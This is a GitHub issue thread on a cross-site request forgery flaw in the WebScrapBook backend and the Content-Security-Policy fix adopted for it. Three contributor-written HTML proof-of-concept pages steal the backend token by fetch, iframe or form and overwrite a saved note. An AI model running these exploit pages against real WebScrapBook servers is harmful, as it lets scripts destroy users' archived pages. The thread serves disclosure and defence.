Extension and browser must use distinct "Origin" #16

Open · maxnikulin opened this issue Aug 26, 2020 · 15 comments
Labels: enhancement (New feature or request)

@maxnikulin (Contributor)

I consider the following a quite serious security flaw. The least important consequence is self-destructing captures, but I am afraid of damage to the whole archive.

In my opinion, the extension context (capture and edit) and the browser context (viewing content) should be strictly separated. Ordinary browser windows should have credentials that allow only viewing saved pages; saving new pages or editing them should be available from extension code only.

A fully configured backend should use different domains for the API and for saved content. In quick/developer setup mode it could at least use different ports on localhost. Personally I am considering dnsmasq and a separate subdomain for each saved page.
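A minimal sketch of the quick-setup variant: the same backend started twice on different localhost ports, with the view instance read-only. The make_app(read_only=...) factory is hypothetical, not an existing PyWebScrapBook API:

# Sketch only: make_app(read_only=...) is a hypothetical factory,
# not an existing PyWebScrapBook API.
import threading
from wsgiref.simple_server import make_server

def serve(app, port):
    # Serve a WSGI app on localhost:port forever.
    make_server('127.0.0.1', port, app).serve_forever()

api_app = make_app(read_only=False)   # extension talks to http://localhost:8080
view_app = make_app(read_only=True)   # saved pages viewed at http://localhost:8081

threading.Thread(target=serve, args=(api_app, 8080), daemon=True).start()
serve(view_app, 8081)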

Prerequisite: a JS script leaks somehow from the original page into the capture. It is hard to ensure that all scripts are removed even when the related option is set.

Let's assume that there is a note /data/20200825072842466/index.md on the server. In real life the URL could be obtained from the directory index.

I put the following file in another directory, simulating a leak of JavaScript into a saved file:

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>webscrapbook backend hack</title>
</head> 
<body>  
        <h1>WebScrapBook backend hack</h1>
        <pre id="log"></pre>
        <script type="text/javascript">
                const hackTarget = '/data/20200825072842466/index.md';
                var log = document.getElementById("log");

                function logError(e) {
                        console.error(e);
                        log.innerText += "\nError:\n" + e + "\n";
                }

                function logSuccess(r) {
                        console.log(r);
                        log.innerText += "\nSuccess:\n" + r + "\n";
                }

                async function hackIt() {
                        const token = (await (await fetch("/?a=token&f=json")).json()).data;
                        logSuccess("token: " + token);
                        const d = new FormData();
                        d.append("token", token);
                        const text = "hacked at " + new Date();
                        d.append("text", text);
                        const res = (await (await fetch(
                                hackTarget + '?a=save&f=json',
                                {method: 'POST', body: d})).json()).data;
                        logSuccess("result: " + res);
                        logSuccess("hacked: " + hackTarget + "\nSet: " + text);
                }

                hackIt().catch(logError);
        </script>
</body>
</html>

I clicked on this page in the WebScrapBook sidebar and got another page overwritten.

I believe a separate WSGI application with no support for modifying actions is required to serve saved pages for viewing. In a "production" setup with a reverse proxy, the application's role shrinks to checking authentication and rendering markdown notes; static files could be served by the reverse proxy directly. A different origin (host or port) is necessary to prevent cross-site request forgery attacks.
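A minimal sketch of what such a view-only application could look like, assuming a Flask-style backend; the set of allowed actions is illustrative:

# Sketch of a view-only front end, assuming a Flask-style backend.
# The action names are illustrative only.
from flask import Flask, request, abort

view_app = Flask(__name__)
ALLOWED_VIEW_ACTIONS = {None, 'view', 'source', 'static'}  # illustrative

@view_app.before_request
def reject_mutations():
    # 'save', 'token', 'delete', ... never reach a handler here.
    if request.method != 'GET' or request.args.get('a') not in ALLOWED_VIEW_ACTIONS:
        abort(403)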

danny0838 added the enhancement (New feature or request) label on Aug 26, 2020
@danny0838 (Owner) commented Aug 26, 2020

I agree that using the same origin for the backend API and for serving captured pages can open a security hole as you described, although it may not be too common, as it requires an intentionally XSS-ing site and a user who captures such a web page without purging scripts (purging is the default WSB capture setting).

However, serving multiple ports/hosts from the backend would significantly increase setup difficulty for the user, and it would also require a large code rework. Furthermore, PyWebScrapBook provides a web interface itself, which can be accessed by visiting a served directory like http://localhost:8384/data, so that the user can modify the database without the WebScrapBook browser extension. Using a different origin would break this as well.

Until we've come up with a full solution, I think we can take advantage of the connect-src content security policy directive, which restricts where the browser may connect from scripts. We can add a Content-Security-Policy: connect-src 'none'; header for all served markdown pages and static files, but not for other web interface pages, to prevent this security hazard, with some caveats (a sketch follows the list):

  • Content-Security-Policy requires a modern browser that supports it. According to the MDN docs it's supported by Chrome >= 25, Firefox >= 23, and most mobile browsers, which should cover most use cases.
  • This will break a benign script in a captured page that accesses sibling resources from the same origin. However, since the context of a page already changes substantially when captured, and AJAX in a captured page can hardly be expected to work anyway, this small additional breakage is not likely a big issue.
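For illustration, a Flask-style hook could attach the header like this; is_served_content() is a made-up predicate that should match served markdown pages and static files but not web interface pages:

from flask import Flask, request

app = Flask(__name__)

@app.after_request
def add_csp(response):
    # is_served_content() is hypothetical: true for markdown pages and
    # static files, false for the web interface.
    if is_served_content(request.path):
        response.headers['Content-Security-Policy'] = "connect-src 'none';"
    return response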

@maxnikulin (Contributor, Author) commented Aug 27, 2020

It seems I found a recipe for a quick fix if the web interface is not necessary. Unlike captured pages, the extension does not send Referer, so I could block token requests if request.referrer is not None.
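A minimal sketch, assuming a Flask-style backend where request.referrer exposes the Referer header:

from flask import Flask, request, abort

app = Flask(__name__)

@app.before_request
def block_referred_token_requests():
    # The extension's fetch() sends no Referer; requests originating from
    # captured pages do, so refuse to issue a token to them.
    if request.args.get('a') == 'token' and request.referrer is not None:
        abort(403)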

I do not think it is really hard for users to add another optional (but highly recommended) config section with another host and port. By default the view and manage interfaces could share the same origin. There is no problem starting another thread with an additional WSGI server in the code. During extension setup it is better to let the user specify either address and fetch the counterpart using a dedicated API method.

The administrative part of the web interface may share an origin with the address used for API requests from the extension, but it should not be the same as the origin used to view saved pages.

In the backend code, the series of if action == ... checks should anyway be rewritten into registration of actions with a "general purpose" API method handler; that would make it easy to support both unified and separated modes (see the sketch below). It is hard for me to estimate the amount of work needed in the extension code to allow distinct URLs for page viewing.
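A minimal sketch of such a registry (names are illustrative, not the current PyWebScrapBook code):

# Sketch of registering actions instead of chained if action == ... checks.
ACTIONS = {}

def action(name, mutating=False):
    def register(handler):
        ACTIONS[name] = (handler, mutating)
        return handler
    return register

@action('view')
def handle_view(request): ...

@action('save', mutating=True)
def handle_save(request): ...

def dispatch(name, request, allow_mutations=True):
    # The view-only server simply dispatches with allow_mutations=False.
    handler, mutating = ACTIONS.get(name, (None, False))
    if handler is None or (mutating and not allow_mutations):
        raise PermissionError(name)
    return handler(request)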

@danny0838 (Owner) commented Aug 27, 2020

What do you think about the CSP approach mentioned above?

A quick test shows it does help block AJAX requests from captured pages. If there's no significant flaw we may implement it for now. As for a full redesign with separated view/administration, it is no small amount of work and may have to wait until we've got time.

@maxnikulin (Contributor, Author)

Sorry for the delay. I realized that I have no solid picture of how to use Content-Security-Policy and Access-Control-* headers to prevent CSRF attacks.

Your idea with connect-src helps against my first variant of the page, but the variant below still "works".

Actually, a restrictive Content-Security-Policy is the reason why I would like to have a subdomain per saved page, at least to manage it with uMatrix.

After reading the "Cross-Site Request Forgery Prevention Cheat Sheet"
https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#double-submit-cookie
I am considering the "double submit cookie" technique: credentials sent through headers are shared by the whole domain, but a cookie can be restricted to particular directories using its path attribute; a sketch follows.
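A minimal sketch of the verification side, Flask-style; the /admin prefix and route are hypothetical, chosen only to illustrate the path restriction:

import secrets
from flask import Flask, request, abort, jsonify

app = Flask(__name__)

@app.route('/admin/token', methods=['POST'])
def issue_token():
    # The path attribute confines the cookie to the management interface,
    # so pages served from /data/ never see or resend it.
    token = secrets.token_urlsafe(32)
    resp = jsonify({'data': token})
    resp.set_cookie('csrf', token, path='/admin', samesite='Strict')
    return resp

def check_double_submit():
    # Mutating handlers call this: the submitted token must match the cookie.
    cookie = request.cookies.get('csrf')
    if not cookie or request.form.get('token') != cookie:
        abort(403)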

Let's obtain a token using an iframe and perform an action by submitting a form:

<!DOCTYPE html>
<html data-scrapbook-type="note">
<head>
<meta charset="UTF-8">
<meta http-equiv="Content-Security-Policy" content="connect-src 'none';">
<title data-scrapbook-elem="title">WSB frame hack</title>
</head>
<body>
        <h1>WebScrapBook iframe hack</h1>
        <iframe src="/?a=token&f=json"></iframe>
        <div>
        <form id="form" action='/data/20200825072842466/index.md?a=save&f=json' method="POST">
                <label>Token <input name="token" id="token"></label>
                <label>Replacement text <input name="text" value="Hacked using form"></label>
                <button type="submit" id="submitit">Hack it!</button>
        </form>
        </div>
        <div>
        <pre id="log"></pre>
        </div>
        <script type="text/javascript">
                const hackTarget = '/data/20200825072842466/index.md';
                var log = document.getElementById("log");
                var tokenInput = document.getElementById("token");
                var form = document.getElementById("form");

                function logError(e) {
                        console.error(e);
                        log.innerText += "\nError:\n" + e + "\n";
                }

                async function hackIt() {
                        const token = JSON.parse(window.frames[0].document.body.innerText).data;
                        tokenInput.value = token;
                        form.submit();
                }

                setTimeout(() => hackIt().catch(logError), 1000);
        </script>
</body>
</html>

@danny0838 (Owner) commented Aug 27, 2020

Good point. Can we prevent this by restricting token to be POST only?

@maxnikulin (Contributor, Author)

You are approaching the limit of my creativity, though I am not a pentester and do not have a ready-to-use cookbook or automated tools. The single-origin approach is fragile: next time I could miss a way to overcome a suggested protection, and it will be even harder to maintain the achieved level of security through unavoidable code modifications.

A token can be obtained with the POST method using a form inside an iframe. Certainly, scripts could be completely disabled on captured pages, and that would work for a significant share of pages; however, it would break pages whose self-contained JavaScript requires no external resources.

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Security-Policy" content="connect-src 'none';">
<meta charset="UTF-8">
<title>WebScrapBook double form hack</title>
</head> 
<body>          
        <h1>WebScrapBook double form hack</h1>
        <div>   
                <iframe src="index.html"></iframe>
        </div>
        <div>
                <form id="tokenForm" action="/?a=token&f=json" method="POST">
                        Form to fetch token
                </form>
        </div>
        <div>
        <form id="overwriteForm" action='/data/20200825072842466/index.md?a=save&f=json' method="POST">
                <label>Token <input name="token" id="token"></label>
                <label>Replacement text <input name="text" value="Hacked using double form"></label>
                <button type="submit" id="submitit">Hack it!</button>
        </form>
        </div>
        <div>
        <!-- logError() appends messages here -->
        <pre id="log"></pre>
        </div>
        <script type="text/javascript">
                const hackTarget = '/data/20200825072842466/index.md';
                var log = document.getElementById("log");
                var tokenInput = document.getElementById("token");
                var overwriteForm = document.getElementById("overwriteForm");
                var tokenForm = document.getElementById("tokenForm");

                function logError(e) {
                        console.error(e);
                        log.innerText += "\nError:\n" + e + "\n";
                }

                async function hackIt() {
                        const token = JSON.parse(window.frames[0].document.body.innerText).data;
                        tokenInput.value = token;
                        overwriteForm.submit();
                }

                if (window.parent == window) {
                        setTimeout(() => hackIt().catch(logError), 1000);
                } else {
                        tokenForm.submit();
                }
        </script>
</body>
</html>

@maxnikulin (Contributor, Author)

There is the form-action CSP directive
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/form-action
but there is no way to say "anything except the origin". I suspect it is a valid use case to store a page in order to keep quick access to some content selector implemented as an HTML form.

@maxnikulin (Contributor, Author)

Obviously I was wrong with:

> It seems I found a recipe for a quick fix if the web interface is not necessary. Unlike captured pages, the extension does not send Referer, so I could block token requests if request.referrer is not None.

since {referrerPolicy: 'no-referrer'} can be passed to the token fetch.

@danny0838 (Owner) commented Aug 29, 2020

If the user can't keep himself from capturing a page with malicious scripts, there's not much we can do.

Even if viewing and administration are origin-separated, a malicious script in the database can still do many bad things, such as cryptomining, generating phishing or CSRF links, auto-downloading malware, or scanning the whole scrapbook and exfiltrating everything to a remote server.

In this respect, CSP may provide more protection than separating origins, by disallowing connections.

I think form actions are something that should be forbidden or at least limited: the intention behind capturing a page containing a form is more likely to get a static reference than a working form, which loses the original context and could be dangerous if accidentally submitted while the server of the source page doesn't guard against such CSRF-like behavior.

Yet another leak is that a malicious script can send offending requests by framing and controlling a privileged page. We probably need to apply CSP to the whole scrapbook site and exempt the privileged scripts by inlining them and using the sha-* source expression. This seems somewhat ugly but is the only way I can think of currently.

Another thing is to restrict framing so that a malicious script can't happily scan the whole site and send data externally by framing. This doesn't seem easy, as we don't want to block framing in normally captured web pages, which can contain frames from the same or a different origin.

@maxnikulin (Contributor, Author)

> In this respect, CSP may provide more protection than separating origins, by disallowing connections.

That is exactly the reason why I am asking for separated origins. I want to delegate CSP management to uMatrix, which offers a decent user interface for granular permissions, or to NoScript, which is simpler. If it is possible to serve different pages from distinct subdomains, it will be easy to set a restrictive default policy and enable scripts only for particular pages.

@danny0838 (Owner)

I don't think requiring an external browser extension is a solution. Additionally, if uMatrix can easily restrict scripts for particular pages, can't it do so when origins are not separated?

Further investigation shows that the sha-* source expression is not supported for connect-src, at least currently. A workaround CSP I can think of for now is:

  • Add Content-Security-Policy: form-action 'none'; connect-src 'none'; for static files and markdown pages.
  • Add Content-Security-Policy: frame-ancestors 'none'; and the compatible X-Frame-Options: deny for other “privileged” pages.

This should block all undesired requests from a potentially malicious script, with the side effect that AJAX and forms are not allowed in captured scripted pages (a sketch follows). Can you check if there's still a possible leak?
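For illustration, the two header sets as a single Flask-style hook; is_served_content() is again a made-up predicate distinguishing captured content from the web interface:

from flask import Flask, request

app = Flask(__name__)

@app.after_request
def apply_policy(response):
    if is_served_content(request.path):
        # Captured pages and static files: no AJAX, no form submission.
        response.headers['Content-Security-Policy'] = (
            "form-action 'none'; connect-src 'none';")
    else:
        # "Privileged" web interface pages: must not be frameable.
        response.headers['Content-Security-Policy'] = "frame-ancestors 'none';"
        response.headers['X-Frame-Options'] = 'deny'
    return response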

Additionally, we may add an app.csp config option, defaulting to true, so that the user can disable the CSP restriction if he really wants to.

@maxnikulin (Contributor, Author)

Unfortunately, it seems impossible to define path-specific CSP rules in uMatrix (at least I could not figure out how to do it, and there is gorhill/uMatrix#734), so the convenient interface exists only at per-domain granularity. Even separating the scrapbook management interface from captured content makes protection more reliable; I consider a subdomain per captured page an extreme case.

I do not think that relying to some extent on other extensions is bad. In my opinion it is better to concentrate on accuracy of capture and convenience of collection management, of course with security in mind.

I was disappointed that Firefox does not support script-src integrity checking for external scripts. And I could not figure out how connect-src could be combined with hashes for dynamic content.

As to forms, besides submission of user data, I have seen an interface to a site archive implemented as a form allowing selection of the period of interest. Sorry, I do not remember the link.

I have no idea yet how to bypass the form-action 'none'; connect-src 'none' + frame-ancestors 'none' protection. Fortunately, server headers take precedence over <meta http-equiv=...>.

@danny0838 (Owner)

> I do not think that relying to some extent on other extensions is bad. In my opinion it is better to concentrate on accuracy of capture and convenience of collection management, of course with security in mind.

Well, it's not quite right to rely on a third-party tool for basic security. We should implement basic security guards by default, possibly with options to turn them off if they conflict with other tools that provide enhanced features.

> As to forms, besides submission of user data, I have seen an interface to a site archive implemented as a form allowing selection of the period of interest. Sorry, I do not remember the link.

CSP only blocks the request made by a form action. If the interface is implemented with JavaScript that listens to the form's submit event and does its own handling, it will not be affected by CSP. OTOH, a javascript:... form action will indeed be blocked by CSP, but that should be an anti-pattern for most JavaScript-based forms.

> I have no idea yet how to bypass the form-action 'none'; connect-src 'none' + frame-ancestors 'none' protection. Fortunately, server headers take precedence over <meta http-equiv=...>.

That's good. We will probably go for this, at least for now.

@danny0838 (Owner)

Implemented CSP in 0.20.0

@maxnikulin (Contributor, Author)

Sorry for the late response. I have checked that my 3 examples do not work against the PyWebScrapBook 0.21.1 backend. Thank you for the CSP fix.

If you do not mind, I would keep this issue open for a while, though I am not expecting particular actions from you currently. I hope to look into the relevant parts of the code more closely to get some impression of what separating the API and view endpoints would take.
